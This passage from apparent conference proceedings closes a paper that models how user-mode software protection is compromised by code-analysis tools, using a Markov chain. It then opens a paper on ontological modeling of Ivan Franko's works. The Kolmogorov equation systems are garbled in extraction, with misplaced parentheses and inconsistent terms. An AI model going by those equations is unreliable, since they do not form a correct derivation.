2. Concurrent operation of user applications, which is marked in the form of shared address spaces; 3. The lack of possibility to load any file which runs without dynamically loaded libraries. Therefore, any address space in a user application contains one or more libraries. In addition, calls to dynamic libraries may be nested; a library that hasn’t been loaded by the executing file may be present in the address space of the application. The “Ring 0” can only be accessed from the address space of a user applications through the system call interface. The allocation of the address spaces of the applications is achieved by overwriting the value in the control register of the base page address – CR3. An address space is automatically created for any new process (processes 1…N are marked on the structural model). The OS uses dynamically loaded libraries to make efficient use of RAM. These libraries are loaded into the address spaces of only the applications that need them (the connection between them is shown with dashed lines through the import and export tables). The above-mentioned features of user applications affect the development of software protection systems that effectively counteract the means of scanning.
240
M. Lutskyi et al.
The results of the analysis of the means of t code investigation are shown on the structural model (Fig. 3), which demonstrates the possible effects on the address space of the application using program code scanning tools. The gray color (Fig. 3) shows the software code investigation tools used to scan the software environment. The gray arrows show the impact that a particular scanning tool can have on getting unauthorized access. The gray arrows that are not leading to information flows, but pointing to the address space of the application, schematically indicate the ability to control the entire address space, and therefore all categories of information flows. Without the use of software systems of information protection, the control of all categories of information flows can be carried out by means of scanning tools. The impact of active emulators and debuggers of user mode on the analyzed application is directly impossible. The only way to implement such interaction is through special interposes communication mechanisms supported by operating system. The call of interposes communication mechanisms from the scanning facilities leads to the invocation of kernel services through the system call interface. Therefore, if the scanning tools use inter-process communication mechanisms, they explicitly address the OS kernel mode (shown with arrows on the structural model), which affects the address space of the application through the “Ring 0” of protection.
Fig. 3. Structural model of information flows of user application software environment in the context of unauthorized investigation
Information Flows Formalization for BSD
241
The impact through the “Ring 0” of protection on the application can also be detected by using the drivers-filters of monitoring software. It is easier to control the information flows of the software environment by means of unauthorized investigation, in case of presence of centralized data structures which are used for control transfer operations. The existing methods of countermeasures can be used to counteract only a part of the considered means for unauthorized investigation. Means of unauthorized research, which can be effectively countered by the existing methods of protection from the software system of information protection, which operates in user mode, are as follows: • • • •
passive code emulators, functioning in user mode; debuggers, functioning in user mode; static scanning tools; memory dumping programs (memory dumping effectively counteracts the use of encryption and pseudo-code, but there are currently no ways to counteract the process of dumping itself).
The following countermeasures used in the software protection subsystem cannot counteract the following means of unauthorized investigation: • software for monitoring the operation of the analyzed application; • active code emulators which function in user mode; • emulators that function in kernel mode. It is almost impossible to successfully counteract the most powerful means of unauthorized investigation, running in kernel mode. This is shown schematically in Fig. 3 by gray arrows from kernel mode scanning tools to the address space of the user’s application. The mentioned structural model supports the conclusions about the need to develop the new ways to counteract the means of unauthorized investigation.
3 Experimental Study and Results The software system of information protection will be completely compromised if control over all categories of information flows is exercised. The implementation of such control is possible in the following cases: 1. The information flows are not protected. 2. There is a successful neutralization of the means of counteraction to unauthorized investigation for the relevant category of the information flows. For the categories of the information flows the following labels are introduced: the information flows of categories 1–3 are denoted by F1 –F3 , accordingly. All considered categories of information flows are independent from each other.
242
M. Lutskyi et al.
During the analysis of an information protection system by means of software code research, the system can be in the following states, which means that the attack process can be described by the following states: 1. The system S1 is not compromised, the means of code investigation are successfully neutralized by the countermeasures implemented for the information flows of categories F1 –F3 ; 2. The system S2 is not compromised; the countermeasures implemented for the information flow F1 are compromised (or haven’t been protected); information flows F3 and F2 successfully counter the means of investigation; 3. The system S3 is not compromised; the countermeasures implemented for the information flow F2 are compromised (or haven’t been protected); information flows F1 and F3 successfully counter the means of investigation; 4. The system S4 is not compromised; the countermeasures implemented for the information flow F3 are compromised (or were not protected); information flows F1 and F2 successfully counter the means of investigation; 5. The system S5 is not compromised; the countermeasures implemented for the information flows F1 and F2 are compromised (or were not protected); information flow F3 successfully counters the means of investigation; 6. The system S6 is not compromised; the countermeasures implemented for the information flows F1 and F3 are compromised (or were not protected); information flow F2 successfully counters the means of investigation; 7. The system S7 is not compromised; the countermeasures implemented for the information flows F2 and F3 are compromised (or were not protected); information flow F1 successfully counters the means of investigation; 8. The state S8 (absorbing state) – the software system of information protection is compromised, information flows of categories F1 –F3 are controlled by investigation means (compromised or unprotected). Therefore, a software system for information protection can be in eight specific states. The initial states may be as follows: 1. 2. 3. 4. 5. 6. 7.
The system S1 The system S2 The system S3 The system S4 The system S5 The system S6 The system S7
is scan-protected information flows of categories F1 –F3 ; is scan-protected information flows of categories F2 , F3 ; is scan-protected information flows of categories F1 , F3 ; is scan-protected information flows of categories F1 , F2 ; is scan-protected information flows of categories F3 ; is scan-protected information flows of categories F2 ; is scan-protected information flows of categories F1 .
Therefore, the initial state for the given software system of information protection is determined by the availability of implemented countermeasures for the relevant category of information flows. To transfer the software system of information protection to the states characterized by neutralization of countermeasures of category F1 flows (transition from S1 to S2 , transition from S3 to S5 , transition from S4 to S6 , transition from S7 to S8 ), a Poisson
Information Flows Formalization for BSD
243
distribution of successful attempts to neutralize the countermeasures for F1 should be applied. The intensity of this Poisson distribution is as follows (1). λ1 (t) = λ12 (t) = λ35 (t) = λ46 (t) = λ78 (t).
(1)
To transfer the software system of information protection to the states characterized by neutralization of countermeasures of category F2 flows (transition from S1 to S3 , transition from S2 to S5 , transition from S4 to S7 , transition from S6 to S8 ), a Poisson distribution of successful attempts to neutralize the countermeasures for F2 should be applied. The intensity of this Poisson distribution is as follows (2): λ2 (t) = λ13 (t) = λ25 (t) = λ47 (t) = λ68 (t).
(2)
To transfer the software system of information protection to the states characterized by neutralization of countermeasures of category F3 flows (transition from S1 to S4 , transition from S2 to S6 , transition from S3 to S7 , transition from S5 to S8 ), a Poisson distribution of successful attempts to neutralize the countermeasures for F3 should be applied. The intensity of this Poisson distribution is as follows (3): λ3 (t) = λ14 (t) = λ26 (t) = λ37 (t) = λ58 (t).
(3)
Therefore, in the software system of information protection which operates in the user mode, represented by graph G, there are flows of events with the three different intensities: λ1 (t) is the intensity of the flow of the successful attempts to neutralize the means of counteraction to the means of the scanning information flows of the F1 category; λ2 (t) is the intensity of the flow of the successful attempts to neutralize the means of counteraction to the means of the scanning information flows of the F2 category; λ3 (t) is the intensity of the flow of the successful attempts to neutralize the means of counteraction to the means of the scanning information flows of the F3 category. The graph G, taking into account the mentioned labels of information flow intensities, is shown in Fig. 4. To simplify the records (1), (2) and (3), the following notation will be used: λi (t) = λi .
(4)
The process of acquiring the control by means of scanning over the software information protection system operating in the user mode is represented by the graph shown in Fig. 4. As it is shown in Fig. 4, the breaching process of a software information protection system, which operates in the user mode (represented by the graph G) can be described using Markov process theory with discrete states and continuous time: • the system contains a finite set of states;
244
M. Lutskyi et al.
• the conditional probabilities of the system at each state do not depend on the time and the way the system has reached this state; • the event flows that move the system from state to state represent a Poisson distribution (ordinal, stationary, no-sequence).
Fig. 4. User mode graph G
Since the system process (shown in Fig. 4) is Markovian, it can be represented using Kolmogorov equations. The system of Kolmogorov equations describing graph G will take the following form (5): ⎧ dp1 (t) ⎪ ⎪ dt = −p1 (t) ∗ (λ1 (t) + λ2 (t) + λ3 (t)) ⎪ ⎪ dp2 (t) ⎪ ⎪ dt = p1 (t) ∗ (λ1 (t) − p2 (t)) ∗ (λ2 (t) + λ3 (t)) ⎪ ⎪ dp3 (t) ⎪ ⎪ ⎪ dt = p1 (t) ∗ (λ2 (t) − p3 (t) ∗ (λ1 (t) + λ3 (t)) ⎪ ⎨ dp4 (t) dt = p1 (t) ∗ (λ3 (t) − p4 (t) ∗ (λ1 (t) + λ2 (t)) . (5) dp5 (t) ⎪ ⎪ dt = p2 (t) ∗ (λ2 (t) − p2 (t) ∗ (λ2 (t) + λ3 (t)) ⎪ ⎪ dp6 (t) ⎪ ⎪ ⎪ dt = p2 (t) ∗ (λ3 (t) + p4 (t) ∗ λ1 (t) − p6 (t) ∗ λ2 (t)) ⎪ dp7 (t) ⎪ ⎪ = p3 (t) ∗ (λ3 (t) + p4 (t) ∗ λ2 (t) − p7 (t) ∗ λ1 (t)) ⎪ ⎪ ⎩ dpdt8 (t) dt = p5 (t) ∗ (λ3 (t) + p6 (t) ∗ λ2 (t) + p7 (t) ∗ λ3 (t)) The use of the normalizing condition makes it possible to reduce the number of equations of the system by one. The normalizing condition is as follows (6): 8 i=1
pi (t) = 1.
(6)
According to the normalizing condition, the p1(t) can be represented as follows (7): p1 (t) = 1 − p2 (t) − p3 (t) − p4 (t) − p5 (t) − p6 (t) − p7 (t) − p8 (t) = 1 −
8 i=2
pi (t). (7)
Information Flows Formalization for BSD
245
Having applied the normalizing condition at any time t, the expression (7) will be obtained. Substituting expression (7) into the system of Eqs. (5), the system of Eqs. (8) is obtained, as follows: ⎧ dp2 (t) 8 ⎪ dt = (1 − i=2 pi (t)) ∗ (λ1 (t) − p2 (t)) ∗ (λ2 (t) + λ3 (t)) ⎪ ⎪ dp3 (t) 8 ⎪ ⎪ ⎪ i=2 pi (t)) ∗ (λ2 (t) − p3 (t) ∗ (λ1 (t) + λ3 (t)) dt = (1 − ⎪ ⎪ dp4 (t) 8 ⎪ ⎪ ⎨ dt = 1 − i=2 pi (t) ∗ (λ3 (t) − p4 (t) ∗ (λ1 (t) + λ2 (t)) dp5 (t) . (8) dt = p2 (t) ∗ (λ2 (t) − p2 (t) ∗ (λ2 (t) + λ3 (t)) ⎪ ⎪ dp (t) ⎪ 6 ⎪ ⎪ dt = p2 (t) ∗ (λ3 (t) + p4 (t) ∗ λ1 (t) − p6 (t) ∗ λ2 (t)) ⎪ ⎪ dp7 (t) ⎪ ⎪ ⎪ dt = p3 (t) ∗ (λ3 (t) + p4 (t) ∗ λ2 (t) − p7 (t) ∗ λ1 (t)) ⎩ dp8 (t) dt = p5 (t) ∗ (λ3 (t) + p6 (t) ∗ λ2 (t) + p7 (t) ∗ λ3 (t))
4 Discussion Consequently, the obtained system of equations makes it possible to determine the probability of compromising the software information protection systems at a random point of time. The enhanced model allows obtaining a quantitative assessment for the considered software information protection systems, which operates in the user mode. The obtained ratings can be used both to compare existing software information protection systems and to analyze modifications in the protection algorithms of software information protection systems. The quantitative assessment can be considered as the probability of the software information protection system not being compromised within a certain period [11, 15]. The improved mathematical model is consistent with the results of simulations and can be used for any information protection system designed to work in user mode.
5 Conclusions This study has analyzed the current research on the OS and user software protection, which reveals several basic areas, including the impact of malware on the OS and user software; vulnerability analysis and threat and risk analysis. The conducted analysis shows that there are open problems associated with the specifics of information processes development of a particular OS, as well as the lack of adequate mathematical models that can be applied to different protection systems in order to obtain quantitative characteristics for their comparison. Also, the structural-analytical model of the information flows of the BSD OS family has been developed, which makes it possible to formalize the information processes of the OS under study and to develop the effective preventive countermeasures. In addition, the mathematical model for the quantitative evaluation of software information security systems operating in user mode has been improved. The quantitative assessment can be considered as the probability of the software information protection system not being compromised within a certain period. This model will be useful both to
246
M. Lutskyi et al.
compare existing software information protection systems and to analyze modifications in the protection algorithms of software information protection systems. In future research studies authors plan to carry out detailed experiments of the both proposed structural-analytical model of the information flows of the BSD OS family and mathematical model for the quantitative evaluation of software information security systems operating in user mode (by using real dataset).
References 1. Gnatyuk, S.: Critical aviation information systems cybersecurity. In: Meeting Security Challenges Through Data Analytics and Decision Support. NATO Science for Peace and Security Series, D: Information and Communication Security, vol. 47, no. 3, pp. 308–316. IOS Press Ebooks (2016) 2. Delimitrou, C., Kozyrakis, C.: Security implications of data mining in cloud scheduling. IEEE Comput. Archit. Lett. 15(2), 109–112 (2016). https://doi.org/10.1109/LCA.2015.2461215 3. Kocher, P., Lee, R., McGraw, G., Raghunathan, A., Ravi, S.: Security as a new dimension in embedded system design. In: 41st Design Automation Conference, pp. 753–760 (2004) 4. Kaur, K., Garg, S., Kaddoum, G., Bou-Harb, E., Choo, K.R.: A big data-enabled consolidated framework for energy efficient software defined data centers in IoT setups. IEEE Trans. Ind. Inf. 16(4), 2687–2697 (2020). https://doi.org/10.1109/TII.2019.2939573 5. Alimseitova, Z., Adranova, A., Akhmetov, B., Lakhno, V., Zhilkishbayeva, G., Smirnov, O.: Models and algorithms for ensuring functional stability and cybersecurity of virtual cloud resources. J. Theor. Appl. Inf. Technol. 98(21), 3334–3346 (2020) 6. Gnatyuk, S., Berdibayev, R., Avkurova, Z., Verkhovets, O., Bauyrzhan, M.: Studies on cloudbased cyber incidents detection and identification in critical infrastructure. CEUR Workshop Proc. 2923, 68–80 (2021) 7. Solms, S., Futcher, L.: Adaption of a secure software development methodology for secure engineering design. IEEE Access 8, 125630–125637 (2020) 8. Núñez, J.C.S., Lindo, A.C., Rodríguez, P.G.: A preventive secure software development model for a software factory: a case study. IEEE Access 8, 77653–77665 (2020) 9. Moyo, S., Mnkandla, E.: A novel lightweight solo software development methodology with optimum security practices. IEEE Access 8, 33735–33747 (2020). https://doi.org/10.1109/ ACCESS.2020.2971000 10. Khan, R., Khan, S., Khan, H., Ilyas, M.: Systematic mapping study on security approaches in secure software engineering. IEEE Access. 9, 19139–19160 (2021). https://doi.org/10.1109/ ACCESS.2021.3052311 11. McGraw, G.: Software security: building security. In: 17th International Symposium on Software Reliability Engineering, pp. 6–6 (2006). https://doi.org/10.1109/ISSRE.2006.43 12. Ostroumov, I., Kuzmenko, N.: Configuration analysis of European navigational aids network. In: Integrated Communications Navigation and Surveillance Conference (ICNS), pp. 1–9 (2021). https://doi.org/10.1109/ICNS52807.2021.9441576 13. Kuzmin, V., Zaliskyi, M., Odarchenko, R., Petrova, Y.: New approach to switching points optimization for segmented regression during mathematical model building. CEUR Workshop Proc. 3077, 106–122 (2022) 14. Ostroumov, I., Kuzmenko, N.: Compatibility analysis of multi signal processing in APNT with current navigation infrastructure. Telecommun. Radio Eng. 77, 211–223 (2018) 15. Solomentsev, O., Zaliskyi, M., Shcherbyna, O., Kozhokhina, O.: Sequential procedure of changepoint analysis during operational data processing. In: Microwave Theory and Techniques in Wireless Communications, pp. 168–171 (2020). https://doi.org/10.1109/MTTW51 045.2020
Information and Communication Technology in Scientific Research
Ontological Modeling in Humanities Viktoriia Atamanchuk1(B) and Petro Atamanchuk2 1 National Centre “Junior Academy of Sciences of Ukraine”, Kyiv, Ukraine
[email protected] 2 Ternopil Volodymyr Hnatiuk National Pedagogical University, Ternopil, Ukraine
Abstract. The article analyzes the possibilities of using transdisciplinary ontology to represent information about the work of Ivan Franko (based on the program of Ukrainian literature for 10–11 grades, standard level). The object of research is to study the characteristics of the transdisciplinarity phenomenon in scientific and educational dimensions. The subject of research is transdisciplinary ontology as a tool to solve scientific problems. The aim of the study is to create a transdisciplinary ontology based on the work of Ivan Franko in the program of Ukrainian literature for 10–11 grades (standard level). The scientific significance of the study comprises the multidimensionality and multilevel nature of transdisciplinary research, which is determined by the study of scientific problems through the analysis of diverse projections in different scientific fields, which forms a holistic transdisciplinary paradigm. The practical significance of the study is determined by the consideration of important features of transdisciplinary ontology and means of its expression on the material of a fragment of the curriculum in Ukrainian literature for 10–11 grades; by the implementation of visualization of the formed transdisciplinary ontology with the help of cognitive IT platform “POLYEDR” (KIT “POLYEDR”); by the opportunities to use different forms of transdisciplinary ontology visualization. Keywords: Ontological modeling · taxonomy · transdisciplinary ontology · transdisciplinarity · cognitive services
1 Introduction Ontological modeling has become an essential part of management method in modern science and education as it provides a wide range of possibilities for research and further results application. As for the Humanities, ontological modeling seems to be extremely effective since it is helpful while handling with the vast amounts of information, creating structural schemes, interactive models necessary for successful information processing. Ontological modeling performs productive and efficient digital instruments for educational and scientific tasks fulfillment as it reflects digital shifts which are simultaneously the result and the reason of knowledge base formation that transform greatly the process of knowledge representation and perception owing to its digital reflection.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 249–259, 2023. https://doi.org/10.1007/978-3-031-35467-0_17
250
V. Atamanchuk and P. Atamanchuk
Scientists claim ontologies to be one of the most widely-spread technologies, dealing with knowledge dissemination in different spheres, especially those connected to educational process [1]. Ontologies have proved to be efficient for modeling goals, instructional processes and instructional material within framework for design of educational technologies [2]. Attention is paid to automatic construction of educational ontology by converting domain textbooks into ontology [3]. Ontologies are considered to be an essential part of digital environment [4], which seems to be personalized and adaptive, using ontology to model a specific learning subject. E-learning on the basis of dynamic ontologies [5] is considered to generate personalized learners’ recommendations. Researchers also examine possibilities of creation of smart learning recommender based on multiple intelligence and fuzzy ontology [6]. The attention is paid to formation of online learning resources recommendations based on hybrid ontology based approach [7]. Scientists discover novel approaches for using ontologies in learning and education [8–10], which makes the educational process more flexible, coherent and comprehensive. Researchers focus their attention on the problem of ontology utilization to upgrade predictions of students’ interaction models [11]. There are many studies, devoted to analysis of existing ways of ontologies representation, their functions, capabilities for appliance in scientific, educational, business, etc. spheres, as well as to invention of novel methods and modes of ontologies representation in order to improve and expand possibilities of ontologies application. Among such studies one can distinguish the performance of a new generic approach of fuzzification which allows a semantic representation of crisp and fuzzy data in a domain ontology [12], of a novel approach that encompasses ontology-based data access and visual analytics, combining the advantages of the ontological paradigm with the flexibility and robustness of a visual analytics environment [13], of a new ontology learning algorithm for ontology similarity measuring and ontology mapping by means of singular value decomposition method and deterministic sampling iteration [14]. Contemporary studies on ontologies prove the vast range of ontologies specification from the point of view of scientific thinking. Technical and technological parameters of ontologies design, depiction, presentation seem to be very important as show different ways of functional improvement. Also much attention is focused on different spheres of ontologies application. Our aim is to learn theoretical basis and to analyze practical results of ontology usage in Humanities. The goal of the study is to substantiate the necessity and effectiveness of ontological modeling in Humanities. Formulation of the Problem. In the process of performing research objectives there is a need for a precise information structuring; in establishing correlations and hierarchical coherence between components of the structure, that is being comprehended. These scientific problems can be solved with the help of ontologies. According to the aim and the outlined problem of the study one can define the tasks of the study: to examine theoretical peculiarities of ontologies use; to define research possibilities of ontological environments in Humanities projection; to construct a transdisciplinary ontology based on the work of Ivan Franko; to determine transdisciplinary ontologies functional
Ontological Modeling in Humanities
251
capacities. The structure of the article comprises Introduction, Materials and Methods, Experiments, Results, Discussion, Conclusions and References.
2 Materials and Methods There are different ontology definitions. Stryzhak et al. [15] designate ontology as an object-oriented functional resource, which is based on expert knowledge and qualitatively represents the subject area. This definition comprises the notion of ontology which reflects the process of conceptualization. Oberle et al. [16] identify computational ontologies as a means to formally model the structure of a system, namely, the relevant entities and relations that emerge from its observation. The scientists emphasize the structural correlations of definite sphere being analyzed. So we can consider ontology as a system of concepts of a definite knowledge branch. To form system of concepts we have to formalize information being processed by using taxonomization. Taxonomy which is considered to be a set of classified notions and terms in hierarchal order, forms the basis for ontology formation. Nadutenko et al. [16] claim that ontology-driven system architecture implements procedures of taxonomy-based management, which allows dynamic change of the set of available functions, interfaces, and so on. Construction of taxonomy is directed to reflection of interconnections of its structural elements as specific to determined subject area terms, ideas, processes, etc. Using taxonomy we structure the information as a text with terms hierarchical representation. The text thus processed can be further reflected as a graph with vertices of distinguished concepts, their meanings and contexts. Respectively, graph edges correspond between ontology components represented in the vertices. As ontology comprises such elements as concepts, attributes and relations, it seems to be a universal tool for research. Ontological modeling direct us to transdisciplinary perception of scientific problems as it helps to precisely identify the terminological structure of different branches of science for further tracing their intercorrelations at the levels of ideas, processes, phenomena, etc. The concept of transdisciplinarity forms the theoretical basis for the productive use of information and educational resources aimed at forming a single information and educational environment. The concept of transdisciplinarity is studied in the scientific works of S. Dovhyi [18], O. Stryzhak [19] and others. Transdisciplinary ontologies are important tools for performing scientific research. In particular, transdisciplinary ontologies of knowledge systems serve as important tools for creating network-centric cognitive services that provide analysis, structuring, selection of information according to certain criteria, which creates conditions for its further interpretation and application taking into account diverse structural relationships. In this case, the ontology is considered as a structural unification of a particular subject area with the help of semantic models that contain descriptions of basic information that have a hierarchical order based on their properties and interactions. Methods used: analysis of information to distinguish main concepts and to unite them into corresponding concept classes, classification method and systematization method to create Excel table on the basis of concept classes with various concept correlations, visualization method to create ontological graph based on formalized description of the fragment of Ukrainian Literature program.
252
V. Atamanchuk and P. Atamanchuk
Visualization of the formed ontology is carried out with the help of cognitive IT platform “POLYEDR” (KIT “POLYEDR”) [20]. “POLYEDR” provides possibilities to analyze and structurize information according to distinguished parameters on the basis of contextual correlations. Application of set theory and graph theory principles is essential for creation of ontological models. Cognitive IT platform is based on the method of recursive reduction, which helps to transform information by structuring it and further converting into interactive document [19]. Using the method of recursive reduction, it is possible to perform the ontology O = X, R, F, where X represents set of concepts of a subject field, R represents set of relations between concepts, F represents set of functions to interpret X & R. Structuring with the help of recursive reduction comprises recursive application of reduction operator. Reduction operator is shown as combination of three other operators which are ◦ F , where F is an operator of object identifier in applied consistently: Frd = Fx◦ Fsmr ct x X, Fsmr is an operator of correlation identifier in R, Fct is an operator of context identifier, with the help of which the functions of interpretation are defined in the ontology O = X, R, F. The method of recursive reduction is used to create computer program to automatic processing of information in structurally distributed figuration. Also recursive reducer results in formation of xml file, which represents ontology and is available for application using cognitive platform “Polyedr”.
3 Experiments The ontology is formed by means of MS Excel with creation the ontology structure and formation of the ontological graphs content. Visualization of the formed ontology is carried out with the help of cognitive IT platform “POLYEDR” (KIT “POLYEDR”), namely by downloading Excel table into the graph editor which is a part of the platform. Method of recursive reduction is realized in the process of conversion of the fragment of Ukrainian Literature program, devoted to Ivan Franko, into ontology. The ontology is created as a result of recursive reducer conversion and contains such categories as Poetic Collection ‘From Peaks and Valleys’, Poetic Collection ‘Withered Leaves’, Philosophical Poetry, Poem ‘Moses’, Prose of Ivan Franko, their subcategories as Genre, Composition, Ideas and Problems, etc. Ontological descriptions are formed with the help of MS Excel spreadsheet (Fig. 1). Excel spreadsheet contains the table of structure, which defines the information about the objects, and the table of attributes, which defines the information about the object characteristics. The structure of the Excel spreadsheet reflects set of different connection types. The first column contains the name of parent objects, the second column defines the connections, the third column (and all following columns) contains child objects (Fig. 1). These connections are represented as edges in the form of ontograph (Fig. 2). MS Excel spreadsheet is downloaded into editor.ulif.org.ua as a part of cognitive IT platform “POLYEDR” with further generation of graph nodes and graph edges (Fig. 2), which represent distinguished concepts (graph nodes) and their correlations graph edges. According to the functions of ontology (graph) editor we can choose necessary elements of ontology with the help of filtering, for example, one can find information
Ontological Modeling in Humanities
253
Fig. 1. Formation of ontological descriptions using MS Excel spreadsheet (names of ontology concepts)
about Poetic Collection ‘Withered Leaves’ with all its subcategories as definite poems of the collection, their composition, genres, representations of autobiographical elements, reflection of love theme, connections to the artistic context, etc. CIT platform provides filtering of two types: hierarchical filtering (showing connections between objects) and attributive filtering (distinguishing object attributes). We have used hierarchical filtering for the Poetic Collection ‘Withered Leaves’ so the result is a tree, which demonstrates correlations between the objects of ontology. To activate hierarchical filtering we have to press the button of the name of the object (Fig. 2).
Fig. 2. A fragment of the ontology in the form of an ontograph
In ontology redactor there are also options for internal (including information downloaded to server of the platform) and external (including information resources in Internet) semantic search. Such options are useful for further ontology amplification in accordance with arousing educational and scientific tasks.
254
V. Atamanchuk and P. Atamanchuk
4 Results Transdisciplinary ontology, formed on the basis of Ivan Franko’s work, appears to be an interactive document with a variety of visual representation, which demonstrates different angles of information perception, different projections of objects of knowledge, providing prospects for their comprehension from integrative positions and also contributes to the formation of a holistic view through reproducible relationships and hierarchical order of them with the help of reproduced relationships and hierarchical order. The ontology creation is the result of performing actions in definite sequence: analysis of the program fragment, its conceptualization with defining main concepts and their semantic correlations, construction of semantic correlations network. Ontological interface forms cognitive and communicative scenario of possible ways of information structuring and performing information as a part of a single research and educational space. Cognitive platform tools provide a precise display of notions of a chosen subject area (namely related to the artistic work of Ivan Franko), their attributes and semantically connected contexts in transdisciplinary representation. Created transdisciplinary ontology supports research activities directed to the usage of multi-level information environment resources, to distinguishing of multi-faceted scientific problems (namely different activity types projected on the artistic works of the poet), to increasing the range of ontology components. Such ontologies can comprise the wide range of thematic directions in Humanities, providing basis for distance education and research, especially taking into account the possibilities of cognitive IT platform as for the number of researchers to take part and scientific resources to be represented.
5 Discussion Examples of the implementation of transdisciplinary ontological strategies in the Humanities are the projects “Shevchenko Portal” (http://kobzar.ua/), “Museum Planet” (https://museum.ulif.org.ua/), designed by the scientists of the National Center “The Junior Academy of Sciences of Ukraine”, “Museum Portal” (https://museum-portal. com/ua/) which has been created in collaboration with “The Junior Academy of Sciences of Ukraine”. The scientists of Academy have elaborated the ontological cabinet for research [21]. The Shevchenko Portal project allows to use methods of system and ontological analysis, construction of information models for studying information about the life and work of the Ukrainian poet; tools for creating e-scenarios, for creating taxonomies and their graphic display, for creating interactive 3D-panoramas. The digitalization of the Humanities takes place in different directions: by integrating digital technologies into the humanities as an integral part of them, which in some way modifies them in social and cultural dimensions; by using digital technologies as tools to help to automate, unify certain elements of analysis, as well as certain types of information analysis in the humanities, to ensure the fullest coverage and systematization of the components selected for analysis. At the same time, the integration of digital technologies and the humanities emphasizes the transdisciplinary aspects of scientific
Ontological Modeling in Humanities
255
thinking, which significantly expand the boundaries of scientific perception by creating new areas of research. Transdisciplinary dimensions of research in the context of ontological representation direct scientific research to the formation and understanding of possible combinations of diverse aspects of certain phenomena, as well as identify opportunities to consider individual fragments of scientific knowledge by tracking correlations and/or considering their multidimensionality. Transdisciplinary research planes form interrelated contexts of research activity, perception and use of scientific knowledge as such, which generate multidimensional correlations between fragments of empirical and theoretical insights. The concept of transdisciplinarity forms the theoretical basis for the productive use of information and educational resources aimed at forming a single information and educational environment. In particular, transdisciplinary ontologies of knowledge systems are important tools for creating network-centric cognitive services that provide analysis, structuring, selection of information according to certain criteria, which allows its further interpretation and application in a variety of structural correlations. In this case, the ontology is considered as a structural unification of a particular subject area with the help of semantic models that contain descriptions of basic information that have a hierarchical order based on their properties and interactions. Ontological modeling makes it possible to structure the material that is the object of study by identifying the structural components according to specific criteria and determining the relevant relationships between them. Ontological modeling demonstrates the structural framework, as well as the ways, types and forms of diverse relationships between the constituent elements of the researched scientific works, researched works of art, etc. The use of ontological modeling in the humanities (literature, cultural studies, sociology, etc.) contributes to the formation of clear and most accurate correlations between the components of the structure of the objects of analysis, as well as determining all existing (and possible) correlations. The advantages of analyzing the products of humanities with the help of ontological modeling include coverage and systematization of all structural components according to the specified parameters, which ensures the adequacy and completeness of the next stages of scientific analysis (based on data obtained from ontological modeling). Visualization of the ontology can be carried out with the help of cognitive IT platform “POLYEDR” (KIT “POLYEDR”) [20]. This platform provides opportunities for conceptual analysis of large amounts of spatially distributed unstructured information (Big Data), for structuring this information, determination the contextual correlations for further possible correlation forecasting and information selection. Designing a transdisciplinary ontology based on the work of Ivan Franko, studied according to the program of Ukrainian literature for 10–11 grades of standard level, provides opportunities for the perception of clearly structured information with visualized mapping of structural components, which creates conditions for an integral understanding of educational material, opportunities for multilevel analysis. The process of forming a transdisciplinary ontology consists of the following stages: semantic analysis of the program in Ukrainian literature, taxonomization of the program, formation of the document structure based on selected terms/concepts (term classes, objects of term classes)
256
V. Atamanchuk and P. Atamanchuk
and contexts, definition of their characteristics and correlations, direct formation of ontological descriptions. Ontological descriptions are formed with MS Excel spreadsheet, that comprises the names of ontology concepts (Fig. 1). Visualization of the formed ontology is carried out with the help of cognitive IT platform “POLYEDR” (KIT “POLYEDR”) downloading MS Excel into the graph editor which is the component of the platform. Ontology could be represented in a form of ontograph (Fig. 2), which demonstrates main concepts of the chosen subject area and their intercorrelations. This ontograph represents the structure of educational material devoted to the study of Ivan Franko’s literary works. One of the types of representation of transdisciplinary ontology is an object mapping (Fig. 3), which is a set of images of those concepts that are components of ontology. The ontology navigator (Fig. 3) reproduces the structure of the ontology and allows researcher to search for specific objects of the ontology. This object mapping ontology reflects objects of ontology, which represent the general information about Ivan Franko, collections of his poetry, definite poetic and prose works according to the program in Ukrainian literature.
Fig. 3. Object mapping ontology
An important aspect of transdisciplinary ontology is the visual representation in the form of a prism (Fig. 4). The facets of the prism are appropriately structured fragments of Ivan Franko’s work, covering the diverse activities of the writer (artistic, scientific, translation, journalistic work, etc.) with appropriate concretization and detailing in accordance with material structuring represented in the Ukrainian literature program. Transdisciplinary ontology, formed on the basis of Ivan Franko’s work, appears as an interactive document with a variety of visual representation, which demonstrates different angles of perception of information, different projections of objects of knowledge, providing prospects for their comprehension from integrative positions, showing them with the help of reproduced relationships and hierarchical order. The universality of transdisciplinary approaches to research, manifested in the creation of scientific thinking holistic paradigm, which includes the formulation of concepts and principles, defining tools for transdisciplinary research, determines the need for theoretical justifications aimed at forming fundamental principles of terminological and classification systems of various subject areas. The use of transdisciplinary ontologies
Ontological Modeling in Humanities
257
Fig. 4. Ontology in the form of a prism
creates the preconditions for the constant expansion of the scope of research problems both within a particular discipline and within the interaction of different subject areas, which helps to determine structural, semantic correlations and correspondences. As for Ivan Franko’s ontology, we can trace transdisciplinary aspects by studying different facets of his rich creative activity as well as by considering philosophical, psychological, linguistic, ethnographic implications in his literary works.
6 Conclusions The concept of ontological modeling in Humanities represents the phenomenon of multivector digital resources, which involves the use of different forms of information (textual, audio, graphic, numerical, etc.), various possibilities of structural and hierarchical organization of information to perform various cognitive, educational, research tasks. Important aspects of ontology usage in Humanities are the formation of new operational capabilities of research due to the use of digital instruments, as well as the transformation of digital instruments into components of contemporary comprehension. Ontological modeling in Humanities involves the creation of digital resources, accumulation of digital materials, their further processing and systematization, which represents a wide range of opportunities depending on the research and educational goals, objectives and specific features of the information being studied. Scholars pay considerable attention to substantiating the theoretical foundations of ontological modeling, covering the principles of transdisciplinary paradigm, methods and tools of digital analysis, common digital models and algorithms, methods of processing big data, etc. Transdisciplinary ontology based on the artistic work of Ukrainian writer Ivan Franko shows the precise structure of different spheres of his activities, including artistic achievements in the fields of poetry, drama, prose, translation, different branches of science (such as philosophy, literary studies), etc. with necessary subdivision according to focusing on
258
V. Atamanchuk and P. Atamanchuk
